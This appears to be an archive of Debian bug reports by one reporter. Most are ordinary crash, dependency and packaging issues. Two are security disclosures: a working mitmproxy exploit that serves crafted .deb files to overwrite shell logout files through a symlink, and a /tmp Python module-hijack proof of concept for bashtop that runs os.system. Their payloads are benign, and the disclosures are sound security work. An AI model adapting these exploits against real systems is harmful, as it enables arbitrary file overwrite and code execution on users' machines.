Bug#1043469: fnt: insecure deb unpacking
Package: fnt
Version: 1.4.1-2
Severity: serious
Tags: security
https://www.gnu.org/software/tar/manual/html_node/Integrity.html says:
"When extracting from two or more untrusted archives, each one should be
extracted independently, into different empty directories. Otherwise,
the first archive could create a symbolic link into an area outside the
working directory, and the second one could follow the link and
overwrite data that is not under the working directory."
But fnt extracts every data.tar file into the same directory and does
not correctly remove files (potentially: malicious symlinks) after
extraction. Since fnt downloads debs over HTTP and does not verify their
integrity in any way, man-in-the-middle attackers could exploit this
vulnerability to overwrite arbitrary files.
I've attached a proof-of-concept exploit in the form of a mitmproxy
script.
--
Jakub Wilk
# encoding=UTF-8
# Copyright © 2023 Jakub Wilk
# SPDX-License-Identifier: MIT
# Usage:
# mitmdump --listen-host 127.0.0.1 -s /path/to/fnt_mitm.py
# and then:
# export http_proxy=http://127.0.0.1:8080/
# fnt update
# fnt install symbola
# fnt install unifont
# logout
import contextlib
import io
import os
import subprocess
import tarfile
import tempfile
try:
from mitmproxy.http import Response as HTTPResponse # mitmproxy >= 7.0
except ImportError:
from mitmproxy.http import HTTPResponse # mitmproxy >= 1.0
payload = b'''\
cowsay pwned
sleep inf
'''
debs = []
def mkar(members):
with tempfile.TemporaryDirectory() as tmpdir:
ar_path = f'{tmpdir}/out.ar'
subprocess.run(['ar', 'rcS', ar_path, *members], check=True)
with open(ar_path, 'rb') as file:
return file.read()
@contextlib.contextmanager
def tmpcwd():
old_cwd = os.getcwd()
try:
with tempfile.TemporaryDirectory() as tmpdir:
os.chdir(tmpdir)
yield
finally:
os.chdir(old_cwd)
with tmpcwd():
members = ['debian-binary', 'control.tar.xz', 'data.tar.xz']
for member in members:
with open(member, 'wb'):
pass
with tarfile.open('data.tar.xz', mode='w|xz') as tfile:
tinfo = tarfile.TarInfo('par')
tinfo.type = tarfile.SYMTYPE
tinfo.linkname = '..'
tfile.addfile(tinfo)
debs += [mkar(members)]
with tarfile.open('data.tar.xz', mode='w|xz') as tfile:
for target in '.bash_logout', '.zlogout':
tinfo = tarfile.TarInfo(f'par/{target}')
tinfo.size = len(payload)
tfile.addfile(tinfo, io.BytesIO(payload))
debs += [mkar(members)]
class state:
n = 0
def request(flow):
if flow.request.path.endswith('.deb'):
flow.response = HTTPResponse.make(
200,
debs[state.n],
{'Content-Type': 'application/vnd.debian.binary-package'}
)
state.n ^= 1
# vim:ts=4 sts=4 sw=4 et
Bug#1037043: pink-pony crashes on start
* Jakub Wilk , 2023-06-02 18:49: ii libsdl1.2-compat-shim [libsdl1.2debian] 1.2.60-1 Looks like it crashes only if libsdl1.2-compat-shim is installed. -- Jakub Wilk
Bug#1037043: pink-pony crashes on start
Package: pink-pony Version: 1.4.1-3.1 Severity: grave pink-pony crashes on start: $ pink-pony malloc(): corrupted top size Aborted Or sometimes: $ pink-pony Segmentation fault Or: $ pink-pony Fatal glibc error: malloc assertion failure in _int_malloc: (unsigned long) (size) >= (unsigned long) (nb) Aborted -- System Information: Architecture: i386 Versions of packages pink-pony depends on: ii libc62.36-9 ii libdevil1c2 1.7.8-10+b3 ii libftgl2 2.4.0-2.1 ii libgcc-s112.2.0-14 ii libgl1 1.6.0-1 ii libglfw3 3.3.8-1 ii libglu1-mesa [libglu1] 9.0.2-1.1 ii libimath-3-1-29 3.1.6-1 ii libprotobuf323.21.12-3 ii libsdl-mixer1.2 1.2.12-17+b3 ii libsdl1.2-compat-shim [libsdl1.2debian] 1.2.60-1 ii libsigc++-2.0-0v52.12.0-1 ii libstdc++6 12.2.0-14 ii libtinyxml2.6.2v52.6.2-6 ii pink-pony-data 1.4.1-3.1 -- Jakub Wilk
Bug#1032177: faketime doesn't fake time (on i386)
Package: faketime Version: 0.9.10-2.1 Severity: grave faketime no longer works on i386: $ faketime -f '2008-12-24 08:15:42' date -R Wed, 01 Mar 2023 08:25:58 +0100 -- System Information: Architecture: i386 Versions of packages faketime depends on: ii libfaketime 0.9.10-2.1 ii libc62.36-8 -- Jakub Wilk
Bug#1031241: aspic: no upstream URL in copyright file
Package: aspic Version: 2.00+dfsg-1 Severity: serious Justification: Policy 12.5 The copyright file doesn't say where the upstream sources were obtained. -- Jakub Wilk
Bug#1030115: opensnitch-ui: AttributeError: module 'PyQt5.Qt' has no attribute 'QItemDelegate'
Package: python3-opensnitch-ui Version: 1.5.3-1 Severity: grave Control: forwarded -1 https://github.com/evilsocket/opensnitch/issues/821 opensnitch-ui does not start: $ opensnitch-ui Themes not available. Install qt-material if you want to change GUI's appearance: pip3 install qt-material. Traceback (most recent call last): File "/usr/bin/opensnitch-ui", line 23, in from opensnitch.service import UIService File "/usr/lib/python3/dist-packages/opensnitch/service.py", line 17, in from opensnitch.dialogs.stats import StatsDialog File "/usr/lib/python3/dist-packages/opensnitch/dialogs/stats.py", line 18, in from opensnitch.customwidgets.main import ColorizedDelegate, ConnectionsTableModel File "/usr/lib/python3/dist-packages/opensnitch/customwidgets/main.py", line 11, in class ColorizedDelegate(Qt.QItemDelegate): AttributeError: module 'PyQt5.Qt' has no attribute 'QItemDelegate' -- System Information: Architecture: i386 Versions of packages python3-opensnitch-ui depends on: ii debconf 1.5.82 ii libqt5sql5-sqlite5.15.8+dfsg-2 ii python3-grpcio 1.51.1-3 ii python3-notify2 0.3-5 ii python3-pyinotify0.9.6-2 ii python3-pyqt55.15.8+dfsg-1 ii python3-pyqt5.qtsql 5.15.8+dfsg-1 ii python3-setuptools 66.1.1-1 ii python3-six 1.16.0-4 ii python3-slugify 4.0.0-2 ii python3 3.11.1-3 ii dialog 1.3-20221229-1 -- Jakub Wilk
Bug#1027049: python-matplotlib-data: missing copyright file
Package: python-matplotlib-data Version: 3.6.2-3 Severity: serious Justification: Policy §12.5 $ lintian -F python-matplotlib-data_3.6.2-3_all.deb E: python-matplotlib-data: no-copyright-file -- Jakub Wilk
Bug#1025380: python3-fissix: SyntaxError: Missing parentheses in call to 'print'
Package: python3-fissix Version: 21.6.6-2 Severity: serious python3-fissix fails to install: Setting up python3-fissix (21.6.6-2) ... File "/usr/lib/python3/dist-packages/fissix/fissix/tests/data/bom.py", line 2 print "BOM BOOM!" ^ SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)? dpkg: error processing package python3-fissix (--configure): installed python3-fissix package post-installation script subprocess returned error exit status 1 Processing triggers for libc-bin (2.36-6) ... Errors were encountered while processing: python3-fissix E: Sub-process /usr/bin/dpkg returned an error code (1) -- System Information: Architecture: i386 Versions of packages python3-fissix depends on: ii python3-appdirs 1.4.4-3 ii python3 3.10.6-3 -- Jakub Wilk
Bug#1023665: pdfposter: ModuleNotFoundError: No module named 'PyPDF2.pdf'
Package: pdfposter
Version: 0.7.post1-2
Severity: grave
pdfposter doesn't work at all:
$ pdfposter --help
Traceback (most recent call last):
File "/usr/bin/pdfposter", line 33, in
sys.exit(load_entry_point('pdftools.pdfposter==0.7.post1',
'console_scripts', 'pdfposter')())
File "/usr/bin/pdfposter", line 25, in importlib_load_entry_point
return next(matches).load()
File "/usr/lib/python3.10/importlib/metadata/__init__.py", line 171, in
load
module = import_module(match.group('module'))
File "/usr/lib/python3.10/importlib/__init__.py", line 126, in
import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "", line 1050, in _gcd_import
File "", line 1027, in _find_and_load
File "", line 992, in _find_and_load_unlocked
File "", line 241, in
_call_with_frames_removed
File "", line 1050, in _gcd_import
File "", line 1027, in _find_and_load
File "", line 1006, in
_find_and_load_unlocked
File "", line 688, in _load_unlocked
File "", line 883, in exec_module
File "", line 241, in
_call_with_frames_removed
File "/usr/share/pdfposter/pdftools/pdfposter/__init__.py", line 27, in
from PyPDF2.pdf import PdfFileWriter, PdfFileReader, PageObject,
getRectangle, \
ModuleNotFoundError: No module named 'PyPDF2.pdf'
-- System Information:
Architecture: i386
Versions of packages pdfposter depends on:
ii python3-pypdf2 2.11.1-1
ii python33.10.6-1
ii python3-pkg-resources 65.5.0-1
ii libjs-jquery 3.6.1+dfsg+~3.5.14-1
ii libjs-underscore 1.13.4~dfsg+~1.11.4-2
--
Jakub Wilk
Bug#1022028: jhead: CVE-2022-41751
* Salvatore Bonaccorso , 2022-10-19 09:53: [1] https://github.com/Matthias-Wandel/jhead/pull/57 This fix is incomplete: https://github.com/Matthias-Wandel/jhead/issues/60 -- Jakub Wilk
Bug#1016385: asn1c-doc: trying to overwrite '/usr/share/doc/asn1c/BUGS', which is also in package asn1c 0.9.28+dfsg-3
Package: asn1c-doc Version: 0.9.28+dfsg-4 Severity: serious Upgrading the package failed: Unpacking asn1c-doc (0.9.28+dfsg-4) over (0.9.28+dfsg-3) ... dpkg: error processing archive /tmp/apt-dpkg-install-wSkNUL/03-asn1c-doc_0.9.28+dfsg-4_all.deb (--unpack): trying to overwrite '/usr/share/doc/asn1c/BUGS', which is also in package asn1c 0.9.28+dfsg-3 -- Jakub Wilk
Bug#1012467: davix ships complete lyrics of "Never Gonna Give You Up"
Source: davix Severity: serious Justification: Policy §2.2.1 test/unit/response-buffer.cpp includes the complete lyrics of Rick Astley's "Never Gonna Give You Up". To the best of my knowledge, this song hasn't been released under a free license, so... You know the rules (and so do I). A full lyrics removal is what I'm thinking of. -- Jakub Wilk
Bug#1007992: libigdgmm12: new version causes segfaults
* Paul Menzel , 2022-03-20, 07:22: Control: forward -1 https://github.com/intel/gmmlib/issues/95 I thought it was `forwarded`, but changed after reading the example in *How to report a bug in Debian using reportbug* [2], which turned out to be wrong. This documentation bug is tracked as #863069. -- Jakub Wilk
Bug#1002909: mypy: FTBFS: test failures
-Wno-unknown-warning-option -Wno-unused-but-set-variable | i686-linux-gnu-gcc -pthread -shared -Wl,-O1 -Wl,-Bsymbolic-functions -g -fwrapv -O2 -Wl,-z,relro -Wl,-z,now -g -O2 -ffile-prefix-map=/build/mypy-NUtJu5/mypy-0.930=. -fstack-protector-strong -Wformat -Werror=format-security -g1 -Wdate-time -D_FORTIFY_SOURCE=2 build/temp.linux-i686-3.10/build/__native_other.o -o build/lib.linux-i686-3.10/other__mypyc.cpython-310-i386-linux-gnu.so | building 'other' extension | i686-linux-gnu-gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O2 -Wall -g -fstack-protector-strong -Wformat -Werror=format-security -g -fwrapv -O2 -g -O2 -ffile-prefix-map=/build/mypy-NUtJu5/mypy-0.930=. -fstack-protector-strong -Wformat -Werror=format-security -g1 -Wdate-time -D_FORTIFY_SOURCE=2 -fPIC -I/usr/include/python3.10 -c build/other.c -o build/temp.linux-i686-3.10/build/other.o -O0 -g1 -Werror -Wno-unused-function -Wno-unused-label -Wno-unreachable-code -Wno-unused-variable -Wno-unused-command-line-argument -Wno-unknown-warning-option -Wno-unused-but-set-variable | i686-linux-gnu-gcc -pthread -shared -Wl,-O1 -Wl,-Bsymbolic-functions -g -fwrapv -O2 -Wl,-z,relro -Wl,-z,now -g -O2 -ffile-prefix-map=/build/mypy-NUtJu5/mypy-0.930=. -fstack-protector-strong -Wformat -Werror=format-security -g1 -Wdate-time -D_FORTIFY_SOURCE=2 build/temp.linux-i686-3.10/build/other.o -o build/lib.linux-i686-3.10/other.cpython-310-i386-linux-gnu.so | copying build/lib.linux-i686-3.10/native__mypyc.cpython-310-i386-linux-gnu.so -> | copying build/lib.linux-i686-3.10/native.cpython-310-i386-linux-gnu.so -> | copying build/lib.linux-i686-3.10/other__mypyc.cpython-310-i386-linux-gnu.so -> | copying build/lib.linux-i686-3.10/other.cpython-310-i386-linux-gnu.so -> | | *** Exit status: 1 | - Captured stderr call - | Expected: | 1 | 2 | 1 (diff) | 2 (diff) | Actual: | 1 | 2 | Traceback (most recent call last):(diff) | File "driver.py", line 8, in(diff) | assert b.foo(o) == id(o) (diff) | AssertionError(diff) | | === short test summary info | FAILED mypyc/test/test_run.py::TestRun::run-classes.test::testSubclassSpecialize1 | FAILED mypyc/test/test_run.py::TestRun::run-classes.test::testSubclassSpecialize2 | FAILED mypyc/test/test_run.py::TestRun::run-multimodule.test::testMultiModuleSpecialize | FAILED mypyc/test/test_run.py::TestRunMultiFile::run-multimodule.test::testMultiModuleSpecialize_multi | FAILED mypyc/test/test_run.py::TestRunSeparate::run-multimodule.test::testMultiModuleSpecialize_separate | == 5 failed, 9634 passed, 371 skipped, 7 xfailed in 292.99s (0:04:52) == Full build logs: https://buildd.debian.org/status/fetch.php?pkg=mypy=i386=0.930-1=1640780974=0 https://buildd.debian.org/status/fetch.php?pkg=mypy=armel=0.930-1=1640784688=0 https://buildd.debian.org/status/fetch.php?pkg=mypy=armhf=0.930-1=1640784140=0 -- Jakub Wilk
Bug#1001318: python-matplotlib-data: missing copyright file
Package: python-matplotlib-data Version: 3.5.0-5 Severity: serious Justification: Policy §12.5 $ lintian -F python-matplotlib-data_3.5.0-5_all.deb E: python-matplotlib-data: no-copyright-file -- Jakub Wilk
Bug#999900: epubcheck: java.lang.StackOverflowError
:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.OneOrMorePattern.checkRestrictions(OneOrMorePattern.java:36) at com.thaiopensource.relaxng.pattern.ChoicePattern.checkRestrictions(ChoicePattern.java:31) at com.thaiopensource.relaxng.pattern.InterleavePattern.checkRestrictions(InterleavePattern.java:37) Messages: 0 fatals / 0 errors / 0 warnings / 0 infos EPUBCheck completed -- System Information: Debian Release: bookworm/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Kernel: Linux 5.14.0-4-amd64 (SMP w/2 CPU threads) Locale: LANG=C, LC_CTYPE=C.UTF-8 (charmap=UTF-8), LANGUAGE not set Shell: /bin/sh linked to /bin/dash Versions of packages epubcheck depends on: ii jarwrapper0.78 ii libcommons-compress-java 1.21-1 ii libguava-java 29.0-6 ii libjackson-json-java 1.9.13-2 ii libjing-java 20181222+dfsg2-6 ii libsac-java 1.3+dfsg-6 ii libsaxonhe-java 9.9.1.5+dfsg-1 -- Jakub Wilk
Bug#999711: netselect-apt: ERROR: The certificate of 'www.debian.org' is not trusted.
Package: netselect-apt Severity: serious netselect-apt doesn't work in a minimal environment: # netselect-apt /usr/bin/which: this version of `which' is deprecated; use `command -v' in scripts instead. Using distribution stable. Retrieving the list of mirrors from www.debian.org... --2021-11-15 12:49:13-- http://www.debian.org/mirror/mirrors_full Resolving www.debian.org (www.debian.org)... 128.31.0.62, 149.20.4.15, 2603:400a::bb8::801f:3e, ... Connecting to www.debian.org (www.debian.org)|128.31.0.62|:80... connected. HTTP request sent, awaiting response... 302 Found Location: https://www.debian.org/mirror/mirrors_full [following] --2021-11-15 12:49:13-- https://www.debian.org/mirror/mirrors_full Connecting to www.debian.org (www.debian.org)|128.31.0.62|:443... connected. ERROR: The certificate of 'www.debian.org' is not trusted. ERROR: The certificate of 'www.debian.org' doesn't have a known issuer. /usr/bin/netselect-apt: wget failed to retrieve http://www.debian.org/mirror/mirrors_full. Please try to correct the problem by reading the wget messages printed above. Installing ca-certificates fixes this. -- System Information: Debian Release: bookworm/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: arm64 (aarch64) Versions of packages netselect-apt depends on: ii curl 7.79.1-2 ii netselect 0.3.ds1-29 ii wget 1.21.2-2 -- Jakub Wilk
Bug#999608: epubcheck: missing dependency on JRE
Package: epubcheck Version: 4.2.4-2 Severity: serious I tried to run epubcheck in a minimal environment, but it didn't work: $ epubcheck --help In order to run Java programs you must install a compatible JRE. If you don't know what JRE you need, default-jre is probably a good bet -- System Information: Architecture: arm64 (aarch64) Versions of packages epubcheck depends on: ii jarwrapper0.78 ii libcommons-compress-java 1.21-1 ii libguava-java 29.0-6 ii libjackson-json-java 1.9.13-2 ii libjing-java 20181222+dfsg2-5 ii libsac-java 1.3+dfsg-6 ii libsaxonhe-java 9.9.1.5+dfsg-1 -- Jakub Wilk
Bug#997758: nose: FTBFS: There is a syntax error in your configuration file: invalid syntax (conf.py, line 220)
Control: tags -1 + patch
* Dmitry Shachnev , 2021-10-24, 16:24:
setuptools v58.0.0 removed support for 2to3 during builds,
which nose relied on (because it has a Python 2 codebase).
You can convert the source to be compatible with Python 3 with these
commands:
patch -p1 unit_tests/test_issue_100.rst <
unit_tests/test_issue_100.rst.py3.patch
2to3 -wn .
find -name '*.rst' | xargs 2to3 -dwn
Then you need a few small changes (see the attached patches) to stop
the build system from trying to run 2to3 stuff again at build time.
--
Jakub Wilk
--- a/selftest.py
+++ b/selftest.py
@@ -32,7 +32,7 @@ if __name__ == "__main__":
this_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
lib_dirs = [this_dir]
test_dir = this_dir
-if sys.version_info >= (3,):
+if False:
# Under Python 3.x, we need to 'build' the source (using 2to3, etc)
# first. 'python3 setup.py build_tests' will put everything under
# build/tests (including nose itself, since some tests are inside the
--- a/setup.py
+++ b/setup.py
@@ -6,7 +6,7 @@ py_vers_tag = '-%s.%s' % sys.version_inf
test_dirs = ['functional_tests', 'unit_tests', os.path.join('doc','doc_tests'), 'nose']
-if sys.version_info >= (3,):
+if False:
import setuptools
extra = {'use_2to3': True,
--- a/setup3lib.py
+++ b/setup3lib.py
@@ -3,7 +3,7 @@ from setuptools import setup as _setup
py3_args = ['use_2to3', 'convert_2to3_doctests', 'use_2to3_fixers', 'test_dirs', 'test_build_dir', 'doctest_exts', 'pyversion_patching']
-if sys.version_info < (3,):
+if True:
# Remove any Python-3.x-only arguments (so they don't generate complaints
# from 2.x setuptools) and then just pass through to the regular setup
# routine.
--- a/setup.cfg
+++ b/setup.cfg
@@ -2,7 +2,6 @@
with-doctest = 1
doctest-extension = .rst
doctest-fixtures = _fixtures
-py3where = build/tests
[bdist_rpm]
doc_files = README.txt
diff -Nru nose-1.3.7/debian/clean nose-1.3.7/debian/clean
--- nose-1.3.7/debian/clean 2020-07-17 22:44:16.0 +0200
+++ nose-1.3.7/debian/clean 2021-10-25 18:14:56.0 +0200
@@ -6,3 +6,4 @@
functional_tests/support/xunit.xml
nose.egg-info/
unit_tests/support/doctest/noname_wrapped.not_pyc
+functional_tests/support/issue408/.coverage
diff -Nru nose-1.3.7/debian/rules nose-1.3.7/debian/rules
--- nose-1.3.7/debian/rules 2020-07-17 22:44:16.0 +0200
+++ nose-1.3.7/debian/rules 2021-10-25 18:14:56.0 +0200
@@ -3,7 +3,7 @@
DESTDIR3 := $(CURDIR)/debian/python3-nose
export PYBUILD_NAME = nose
-export PYBUILD_TEST_ARGS_python3 = {interpreter} setup.py build_tests && {interpreter} selftest.py -v
+export PYBUILD_TEST_ARGS_python3 = {interpreter} setup.py egg_info && {interpreter} selftest.py -v
BUILDDIR3 := $(shell pybuild --print build_dir --interpreter python3)
Bug#995477: cppman: error: no such table: cppreference.com_keywords
Package: cppman Version: 0.5.3+dfsg1-1 Severity: grave cppman doesn't work at all: $ cppman std::unique_ptr error: no such table: cppreference.com_keywords -- System Information: Architecture: i386 Versions of packages cppman depends on: ii python3 3.9.2-3 ii bsdmainutils 12.1.7+nmu3 ii groff-base1.22.4-7 ii python3-bs4 4.9.3-1 ii python3-html5lib 1.1-3 Versions of packages cppman recommends: ii less 551-2 -- Jakub Wilk
Bug#968816: tilix: Library load failed (librsvg-2.so.2): ... Illegal instruction
Package: tilix Version: 1.9.3-4+b2 Severity: serious When librsvg2-2 is not installed, tilix crashes with SIGILL: $ tilix object.Exception@generated/gtkd/gtkd/Loader.d(125): Library load failed (librsvg-2.so.2): librsvg-2.so.2: cannot open shared object file: No such file or directory Illegal instruction GDB says: (gdb) x/i $pc => 0xf6c61df1 <_D2rt8monitor_9lockMutexFNbNiPS4core3sys5posixQk5types15pthread_mutex_tZv+33>: ud2 (gdb) bt #0 0xf6c61df1 in _D2rt8monitor_9lockMutexFNbNiPS4core3sys5posixQk5types15pthread_mutex_tZv () from /usr/lib/i386-linux-gnu/libdruntime-ldc-shared.so.91 #1 0xf6c57641 in _d_criticalenter () from /usr/lib/i386-linux-gnu/libdruntime-ldc-shared.so.91 #2 0xf6c65ca6 in _staticDtor_L376_C1 () from /usr/lib/i386-linux-gnu/libdruntime-ldc-shared.so.91 #3 0xf6c61344 in rt.minfo.ModuleGroup.runTlsDtors() () from /usr/lib/i386-linux-gnu/libdruntime-ldc-shared.so.91 #4 0xf6c63a44 in _d_dso_registry () from /usr/lib/i386-linux-gnu/libdruntime-ldc-shared.so.91 #5 0xf6c176e2 in ldc.register_dso () from /usr/lib/i386-linux-gnu/libdruntime-ldc-shared.so.91 #6 0xf7f9626a in _dl_fini () at dl-fini.c:138 #7 0xf69d780e in __run_exit_handlers (status=1, listp=0xf6b853fc <__exit_funcs>, run_list_atexit=true, run_dtors=true) at exit.c:108 #8 0xf69d79e1 in __GI_exit (status=1) at exit.c:139 #9 0xf69bee02 in __libc_start_main (main=0x5665e230 , argc=1, argv=0xffb25e64, init=0x5675fc60 <__libc_csu_init>, fini=0x5675fcc0 <__libc_csu_fini>, rtld_fini=0xf7f96080 <_dl_fini>, stack_end=0xffb25e5c) at ../csu/libc-start.c:342 #10 0x56650061 in _start () -- System Information: Architecture: i386 Versions of packages tilix depends on: ii dconf-gsettings-backend [gsettings-backend] 0.36.0-1 ii libc62.31-3 ii libgtkd-3-0 3.9.0-3+b3 ii libphobos2-ldc-shared91 1:1.21.0-1+b1 ii libunwind8 1.3.2-2 ii libvted-3-0 3.9.0-3+b3 ii libx11-6 2:1.6.10-3 ii tilix-common 1.9.3-4 -- Jakub Wilk
Bug#965067: googler: "No results"
* SZ Lin , 2020-08-17, 17:29: After investigating this issue, I cherry-picked 6 commits [1] to fix this. It works for me now, and it would be great if you can have a test before uploading. debian/patches/series looks broken: every patch name is mentioned twice!? I wasn't able to apply patches using "QUILT_PATCHES=debian/patches quilt push -a" because of this brokenness. (But curiously, dpkg-source's implementation of quilt seemed to be happy with it.) Other than that, 8fcac9bcbcfa13e2 works for me. -- Jakub Wilk
Bug#968336: afl++: Illegal instruction
Package: afl++ Version: 2.66c-1 Severity: grave afl-fuzz crashes with illegal instruction every time. GDB says: Program received signal SIGILL, Illegal instruction. 0x5657e8ef in rand_set_seed () => 0x5657e8ef : c5 f9 6e c0 vmovd %eax,%xmm0 It's an AVX instruction, which is indeed not supported by my CPU. -- System Information: Architecture: i386 Versions of packages afl++ depends on: ii build-essential 12.8 ii libc62.31-3 ii libpython3.8 3.8.5-2 -- Jakub Wilk
Bug#965067: googler: "No results"
Package: googler Version: 3.7.1-1 Severity: grave Control: fixed -1 4.1-1 googler in buster seems completely broken. I get "No results" every time. -- Jakub Wilk
Bug#964366: [aristocratos/bashtop] [BUG] insecure use of /tmp (#161)
* Dylan Aïssi , 2020-07-06, 15:13:
pytmpdir=$(mktemp -d "${TMPDIR:-/tmp}"/)
pywrapper=$(mktemp "${pytmpdir}"/bashtop.psutil.)
Should fix the issue.
Does the proposed fix by upstream look good to you?
It's mostly OK, but:
- mktemp(1) can fail, and this failure should not be ignored;
- there's no need for two mktemp calls.
Something like this should work:
pytmpdir=$(mktemp -d "${TMPDIR:-/tmp}"/bashtop.XX) || exit 1
pywrapper=${pytmpdir}/psutil
--
Jakub Wilk
Bug#964366: bashtop: insecure use of /tmp
Package: bashtop
Version: 0.9.19-1
Severity: grave
Tags: security
bashtop creates a Python script in /tmp and runs it. But Python adds the
directory containing the script to the module search path¹, and /tmp is
world-writable, so this in insecure. A local user could plant malicious
Python module in /tmp, which would be executed by bashtop.
Proof of concept:
$ install -m 644 /path/to/psutil.py /tmp
$ bashtop
___
< pwned >
---
\ ^__^
\ (oo)\___
(__)\ )\/\
||w |
|| ||
Aborted
¹ https://docs.python.org/3/using/cmdline.html#cmdarg-script
-- System Information:
Architecture: i386
Versions of packages bashtop depends on:
ii bash5.0-6
ii gawk1:5.0.1+dfsg-1
ii procps 2:3.3.16-5
Versions of packages bashtop recommends:
ii lm-sensors 1:3.6.0-2
un sysstat
ii python3-psutil 5.7.0-1
ii curl7.68.0-1
--
Jakub Wilk
import os; os.system('(tput reset && cowsay pwned) >/dev/tty; kill -ABRT %s' % os.getppid())
Bug#962995: testssl.sh: missing dependencies
Package: testssl.sh Version: 3.0.2+dfsg1-1 Severity: serious I got this in a minimal environment: $ testssl --help Fatal error: You need to install hexdump for this program to work After "apt-get install bsdmainutils" it became: Fatal error: You need to install ps for this program to work After "apt-get install procps" I could finally see help, but still couldn't test anything: $ testssl example.org No engine or GOST support via engine with your /usr/bin/openssl Fatal error: Neither "dig", "host", "drill" or "nslookup" is present -- System Information: Architecture: i386 Versions of packages testssl.sh depends on: ii openssl 1.1.1g-1 -- Jakub Wilk
Bug#961245: mercurial-common: trying to overwrite '/usr/lib/python2.7/dist-packages/hgext/git/__init__.py', which is also in package mercurial-git 0.8.12-1.2
* Axel Beckert , 2020-05-22, 00:22: dpkg: error processing archive /var/cache/apt/archives/mercurial-common_5.4-1_all.deb (--unpack): trying to overwrite '/usr/lib/python2.7/dist-packages/hgext/git/__init__.py', which is also in package mercurial-git 0.8.12-1.2 dpkg-deb: error: paste subprocess was killed by signal (Broken pipe) Errors were encountered while processing: /var/cache/apt/archives/mercurial-common_5.4-1_all.deb Note that there's no such conflict upstream, because hg-git installs the module as "hggit" (not in the "hgext" namespace). This mess is my fault. When I packaged hg-git in 2009, it was so immature it didn't even have installation scripts. Instead their README said: Clone this repository somewhere and make the 'extensions' section in your `~/.hgrc` file look something like this: [extensions] hgext.bookmarks = hgext.hg-git = [path-to]/hg-git I decided to install it as a public module "hgext.git", without even talking to upstream. In retrospect, it was a terrible idea. :-( Ideally this should be fixed by renaming the hg-git's module back to what upstream uses. But of course this is going to break all hg-git users' configurations. :-/ -- Jakub Wilk
Bug#959859: libjs-jquery: broken symlink /usr/share/javascript/jquery
Package: libjs-jquery Version: 3.5.0+dfsg-2 Severity: grave User: debian...@lists.debian.org Usertags: adequate broken-symlink /usr/share/javascript/jquery is a broken symlink: $ dpkg -L libjs-jquery | xargs -n1 file | grep broken /usr/share/javascript/jquery: broken symbolic link to 3.5.0+dfsg-1~ This bug was found using adequate: https://packages.debian.org/unstable/main/adequate -- System Information: Architecture: i386 Versions of packages libjs-jquery depends on: ii node-jquery 3.5.0+dfsg-2 -- Jakub Wilk
Bug#950916: libtool-doc: trying to overwrite '/usr/share/doc/libtool/AUTHORS', which is also in package libtool
Package: libtool-doc Version: 2.4.6-11 Severity: serious The package failed to upgrade: Preparing to unpack .../28-libtool-doc_2.4.6-12_all.deb ... Unpacking libtool-doc (2.4.6-12) over (2.4.6-11) ... dpkg: error processing archive /tmp/apt-dpkg-install-Kxxra4/28-libtool-doc_2.4.6-12_all.deb (--unpack): trying to overwrite '/usr/share/doc/libtool/AUTHORS', which is also in package libtool 2.4.6-12 dpkg-deb: error: paste subprocess was killed by signal (Broken pipe) ... Errors were encountered while processing: /tmp/apt-dpkg-install-Kxxra4/28-libtool-doc_2.4.6-12_all.deb E: Sub-process /usr/bin/dpkg returned an error code (1) -- Jakub Wilk
Bug#946484: internetarchive: DistributionNotFound: The 'backports.csv' distribution was not found
Package: internetarchive Version: 1.8.5-1 Severity: grave The ia command doesn't work at all: $ ia help Traceback (most recent call last): File "/usr/bin/ia", line 6, in from pkg_resources import load_entry_point File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 3250, in @_call_aside File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 3234, in _call_aside f(*args, **kwargs) File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 3263, in _initialize_master_working_set working_set = WorkingSet._build_master() File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 583, in _build_master ws.require(__requires__) File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 900, in require needed = self.resolve(parse_requirements(requirements)) File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 786, in resolve raise DistributionNotFound(req, requirers) pkg_resources.DistributionNotFound: The 'backports.csv' distribution was not found and is required by internetarchive -- System Information: Architecture: i386 Versions of packages internetarchive depends on: ii python3 3.7.5-3 ii python3-internetarchive 1.8.5-1 -- Jakub Wilk
Bug#946353: tran: Conflict for [ა] in mtavruli>latin, it resolves to [a] and [a]
Package: tran Version: 4-1 Severity: grave tran no longer works in unstable: $ echo foo | tran Conflict for [ა] in mtavruli>latin, it resolves to [a] and [a] -- System Information: Architecture: i386 -- Jakub Wilk
Bug#943695: didjvu: FTBFS: ERROR: tests.test_timestamp.test_timezones
